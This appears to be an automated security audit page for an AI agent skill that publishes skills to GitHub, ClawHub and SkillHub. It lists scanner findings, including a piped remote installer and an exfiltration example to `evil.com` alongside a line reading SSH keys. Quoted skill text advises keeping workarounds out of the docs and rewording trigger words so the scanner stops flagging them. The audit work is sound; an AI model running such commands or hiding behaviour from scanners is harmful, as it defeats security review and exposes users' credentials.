Back to skill

Security audit

Skill Publisher 技能发布

Security checks for vulnerabilities and agentic risk

Overview

The skill mostly matches its publishing purpose, but it includes high-impact local synchronization and installer/authentication steps that need review before use.

Install only if you are comfortable giving the agent publishing tokens and letting it mutate skill repositories. Before use, disable or tightly review the local `sync_skills.py` step, avoid the all-skills sync mode, install SkillHub CLI through a verified manual path, and run authentication only on a trusted single-user machine.

Vulnerability Patterns
  • Remote Payload Retrieval and ExecutionFetches external code whose behavior can change after review
  • Tool Hijacking and SpoofingModifies or replaces tools so legitimate-looking calls execute attacker logic
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
Findings (3)

T03 · Remote Payload Retrieval and Execution

Error
Location
references/skillhub-publishing.md:26
Finding

Unverified SkillHub Installer Is Downloaded and Executed Directly

Content
View full analysis
Remediation
View remediation
/install.sh printf '%s %s\n' '' /secure/temp/skillhub-install.sh \ | sha256sum --check # Execute only after successful verification and explicit user confirmation. bash /secure/temp/skillhub-install.sh --cli-only ``` The version and digest must come from a trusted, independently authenticated release channel. ]]>

T09 · Insecure Skill Coding Practices

Warning
Location
references/skillhub-publishing.md:55
Finding

SkillHub Authentication Token Is Exposed in Process Arguments

Content
View full analysis
Remediation
View remediation

T07 · Tool Hijacking and Spoofing

Error
Location
SKILL.md:453
Finding

Local Synchronization Executes an Unbundled Relative Python Script

Content
View full analysis
The following command will overwrite files in the existing installation directory. Back up the old version before execution and use `--dry-run` to preview changes. # Synchronize one specified skill python sync_skills.py # Or synchronize every skill (use cautiously; this overwrites all installation directories) python sync_skills.py ``` The accompanying instruction states that `sync_skills.py` is expected in the external project root, but that script is not included in the audited project. ### Technical Analysis The skill instructs the agent to execute `sync_skills.py` by relative name. The audited artifact does not contain this file, so its implementation, provenance, integrity, and behavior cannot be verified. Relative path resolution causes Python to execute whichever file named `sync_skills.py` is present in the current working directory. A malicious file can therefore spoof the expected synchronization utility. This is especially risky in an agent workflow that may operate on user-selected or externally sourced project directories. The no-argument form further expands the impact by directing the script to synchronize every skill and overwrite multiple local installation directories. Local synchronization is an optional post-publication side effect and is not required to publish to GitHub, ClawHub, or SkillHub, so this execution and overwrite capability exceeds the minimum privilege needed for the core declared publishing function. ### Attack Path 1. An attacker places or modifies `sync_skills.py` in the project root or another directory from which t ...[truncated 1393 chars]
Remediation
View remediation
Vulnerability Patterns
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
  • Rogue AgentSelf-Modification, Session Persistence
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
Findings (39)

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 78)May include surrounding context.

md
**详细文档共享**:本技能读取 skill-forge 的 `references/publishing-guide.md`,内容完全一致。

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 371)May include surrounding context.

md
**详细文档共享**:本技能读取 skill-forge 的 `references/publishing-guide.md`,内容完全一致。

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 626)May include surrounding context.

md
**详细文档共享**:本技能读取 skill-forge 的 `references/publishing-guide.md`,内容完全一致。

Self-Modification

High
Category
Rogue Agent
Confidence
85% confidence
Finding

Skill modifies its own code, configuration, or behavior at runtime. Self-modification enables an agent to escalate privileges, disable safety constraints, or install persistent backdoors.

Content

Scanner excerpt · SKILL.md (reported line 180)May include surrounding context.

md
- **YARA 触发词扫描**:扫描 shell history 清理命令、PowerShell 错误忽略参数、递归强制删除、权限放宽等"自治破坏行为"字面量。这些字符串即使在文档说明中出现也会触发 YARA 规则 `agent_skill_destructive_autonomous_actions`。详见 `references/security-audit.md` Layer 4
    - **Description-Behavior Mismatch**(v5.13 增强,v5.16 增加 What 不 How 原则):frontmatter description 必须与 skill 实际行为一致。如果 description 只说"发布到外部平台",就不能有"修改本地安装目录"的规则;如果有本地修改行为,description 必须明确披露。**description 模板建议(v5.13 新增,源自 kami 审计反馈)**:description 应区分"核心能力"(primary capability,必做的)和"可选能力"(optional capability,有条件触发的)。模板:`<核心能力描述>。可选能力:<可选能力 1>、<可选能力 2>(有条件触发)`。例如:`技能发布 — 将 Skill 推送到三平台。可选能力:本地安装目录同步(仅本地使用)、待补推版本跟踪(GitHub 失败时触发)`。**What 不 How 原则(v5.16 新增,源自 article-tuwen 3 轮审计 — 编排层实现细节文档化触发 8 项 findings)**:description 和 SKILL.md 只描述"做什么"(What),不描述"怎么做"(How)的子技能实现细节。**禁止文档化的实现细节**:① 子技能的端口号/进程操作/脚本文件名 ② 子技能的内部 API 调用链 ③ 子技能的临时文件路径。**编排层特化规则**:如果 skill 是编排层(调用其他 skill 完成任务),只描述编排逻辑(调用哪些 skill、什么顺序、如何组合),不描述子技能的实现。**典型反例**:article-tuwen v1.0.0 在 SKILL.md 中描述了图片搜索子技能的"启动本地服务器监听 8000 端口"实现细节,被 SkillSpector 标记为 Context-Inappropriate Capability。**设计原则**:当技能实际能力超出 description 描述时,SkillSpector 会标为 Description-Behavior Mismatch;区分核心/可选能力可以让 description 更准确,同时不显得过于冗长
    - **安全敏感方案不文档化**:不要在文档中描述应对网络限制的 API 逐文件上传方案(含 blob/tree/commit/refs 链)、base64 编码上传等方案。SkillSpector 会标记为 MCP Tool Poisoning / Tool Parameter Abuse。实际执行时可使用,但不要写进文档
    - **Self-Modification 措辞**:避免"update SKILL.md"这类自修改措辞,改为"Update version in SKILL.md"等具体动作。SkillSpector 会标记为 Rogue Agent Self-Modification
    - **CHANGELOG 历史记录扫描**(v5.16 增加批量授权触发词):CHANGELOG.md 的历史条目也会被扫描。如果历史条目包含 YARA 触发词、凭证字面量调用模式、或批量授权触发词(见第 15 项),必须重新措辞(用类别描述替代字面量)。**v5.16 新增**:CHANGELOG 中"修复了 XXX 字面量"的说明,XXX 必须用类别描述,不能写字面量本身——否则历史记录会持续触发扫描
    - **SSD3 敏感数据派生输出扫描**(v5.9 新增):检查代码是否读取本地敏感文件(如 memory/profile/credentials)并将其派生内容写入持久化输出(JSON/MD/日志)。SkillSpector 会标记为 SSD3 finding。修复方式:输出文件中只记录聚合统计量(如关键词数量),不记录原始关键词列表;推荐理由中不暴露匹配的敏感关键词,使用 generic 描述
    - **MCP Tool Poisoning 完整行为声明**(v5.9 新增,v5.12 增加代码 import 扫描对照):description 必须完整声明 skill 的全部行为范围,不能只描述核心功能。如果
...[truncated 25 chars]

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 389)May include surrounding context.

md
按规则22三级降级:git push → gh CLI → GitHub API(降级方案详见 references/publish-procedures.md,不在此文档化)。创建 Release。git push 持续超时但 API 可达时,直接跳到 Level 3。**GitHub 推送失败时执行规则26(醒目警

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 629)May include surrounding context.

md
按规则22三级降级:git push → gh CLI → GitHub API(降级方案详见 references/publish-procedures.md,不在此文档化)。创建 Release。git push 持续超时但 API 可达时,直接跳到 Level 3。**GitHub 推送失败时执行规则26(醒目警

Credential Access

High
Category
Privilege Escalation
Confidence
90% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · references/publishing-guide.md (reported line 569)May include surrounding context.

md
|---------|---------|-----|
| curl to external server | `curl https://evil.com/collect?data=...` | Remove entirely |
| eval with user input | `eval(user_input)` | Remove or sandbox |
| Reading sensitive dirs | `cat ~/.ssh/id_rsa` | Remove |

### Layer 4: YARA Trigger Word Scan (v5.7 新增)

Credential Access

High
Category
Privilege Escalation
Confidence
90% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · references/security-audit.md (reported line 84)May include surrounding context.

md
|---------|---------|-----|
| curl to external server | `curl https://evil.com/collect?data=...` | Remove entirely |
| eval with user input | `eval(user_input)` | Remove or sandbox |
| Reading sensitive dirs | `cat ~/.ssh/id_rsa` | Remove |

### Layer 4: YARA Trigger Word Scan (v5.7 新增)

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · references/publishing-guide.md (reported line 476)May include surrounding context.

bash
clawhub inspect <slug>
# 检查文件列表中不包含:
# - config.local.json / .env.local / .env
# - _*.py / _*.ps1 (临时脚本)
# - *.log (日志文件)
# - publish_*.ps1 / publish_*.sh (维护者脚本)

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · references/repo-structure.md (reported line 447)May include surrounding context.

bash
clawhub inspect <slug>
# 检查文件列表中不包含:
# - config.local.json / .env.local / .env
# - _*.py / _*.ps1 (临时脚本)
# - *.log (日志文件)
# - publish_*.ps1 / publish_*.sh (维护者脚本)

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · references/security-audit.md (reported line 315)May include surrounding context.

bash
clawhub inspect <slug>
# 检查文件列表中不包含:
# - config.local.json / .env.local / .env
# - _*.py / _*.ps1 (临时脚本)
# - *.log (日志文件)
# - publish_*.ps1 / publish_*.sh (维护者脚本)

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · references/publishing-guide.md (reported line 477)May include surrounding context.

bash
clawhub inspect <slug>
# 检查文件列表中不包含:
# - config.local.json / .env.local / .env
# - _*.py / _*.ps1 (临时脚本)
# - *.log (日志文件)
# - publish_*.ps1 / publish_*.sh (维护者脚本)

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · references/publishing-guide.md (reported line 650)May include surrounding context.

bash
clawhub inspect <slug>
# 检查文件列表中不包含:
# - config.local.json / .env.local / .env
# - _*.py / _*.ps1 (临时脚本)
# - *.log (日志文件)
# - publish_*.ps1 / publish_*.sh (维护者脚本)

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · references/publishing-guide.md (reported line 654)May include surrounding context.

bash
clawhub inspect <slug>
# 检查文件列表中不包含:
# - config.local.json / .env.local / .env
# - _*.py / _*.ps1 (临时脚本)
# - *.log (日志文件)
# - publish_*.ps1 / publish_*.sh (维护者脚本)

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · references/repo-structure.md (reported line 448)May include surrounding context.

bash
clawhub inspect <slug>
# 检查文件列表中不包含:
# - config.local.json / .env.local / .env
# - _*.py / _*.ps1 (临时脚本)
# - *.log (日志文件)
# - publish_*.ps1 / publish_*.sh (维护者脚本)

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · references/security-audit.md (reported line 315)May include surrounding context.

bash
clawhub inspect <slug>
# 检查文件列表中不包含:
# - config.local.json / .env.local / .env
# - _*.py / _*.ps1 (临时脚本)
# - *.log (日志文件)
# - publish_*.ps1 / publish_*.sh (维护者脚本)

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · references/security-audit.md (reported line 386)May include surrounding context.

bash
clawhub inspect <slug>
# 检查文件列表中不包含:
# - config.local.json / .env.local / .env
# - _*.py / _*.ps1 (临时脚本)
# - *.log (日志文件)
# - publish_*.ps1 / publish_*.sh (维护者脚本)

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · references/security-audit.md (reported line 390)May include surrounding context.

bash
clawhub inspect <slug>
# 检查文件列表中不包含:
# - config.local.json / .env.local / .env
# - _*.py / _*.ps1 (临时脚本)
# - *.log (日志文件)
# - publish_*.ps1 / publish_*.sh (维护者脚本)

External Script Fetching

High
Category
Supply Chain
Confidence
95% confidence
Finding

The guide instructs users to execute a remote installer via curl ... | bash, which runs code fetched from the network without prior inspection or integrity verification. If the remote server, CDN, DNS path, or TLS trust chain is compromised, arbitrary code could be executed on the user's machine during installation.

Content

Scanner excerpt · references/skillhub-publishing.md (reported line 26)May include surrounding context.

Mac/Linux

bash
curl -fsSL https://skillhub.cn/install/install.sh | bash -s -- --cli-only
echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.zshrc
source ~/.zshrc
skillhub --version

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
94% confidence
Finding

These lines prescribe that Chinese skills must use Chinese summary and description, while English/bilingual skills must use English. This is a natural-language locale policy embedded in the skill guidance, and it does not offer a user choice or opt-in mechanism for language/locale.

Content

No source excerpt is available for this finding.

Description-Behavior Mismatch

Medium
Category
Not specified by scanner
Confidence
89% confidence
Finding

The skill’s declared trigger scope says it should only run for publishing an already-completed Skill, but Step 1 instructs generating repository structure files such as README.md, CHANGELOG.md, and LICENSE. That broadens behavior from 'publish existing skill' into content/repo scaffolding, which can cause unintended file creation or modification outside the user’s expected action and weakens the trust boundary established by the manifest.

Content

No source excerpt is available for this finding.

Description-Behavior Mismatch

Medium
Category
Not specified by scanner
Confidence
92% confidence
Finding

The manifest says local sync covers the target published skill, but the documented command also permits syncing all installed skills. In context, this is more dangerous because the skill already has broad filesystem write/delete/copy capabilities; a mistaken or implicit 'sync all' could overwrite many local installations beyond the user’s intended target.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

The confirmation template is written entirely in Chinese, implying the skill should present version-bump analysis in that language by default. The file does not offer a language choice or state that Chinese is optional, which conflicts with the language/locale policy criteria.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
88% confidence
Finding

The update workflow summary shows user activation examples only in Chinese, which can be read as requiring Chinese-language invocation. There is no accompanying note that other languages are supported or that the assistant should adapt to the user's language.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
92% confidence
Finding

The instruction "Language: English for Release Notes" imposes a specific language policy in natural language. The file does not provide an opt-in, alternative locale choice, or a clear region-specific justification for this constraint.

Content

No source excerpt is available for this finding.

Static analysis

No suspicious patterns detected.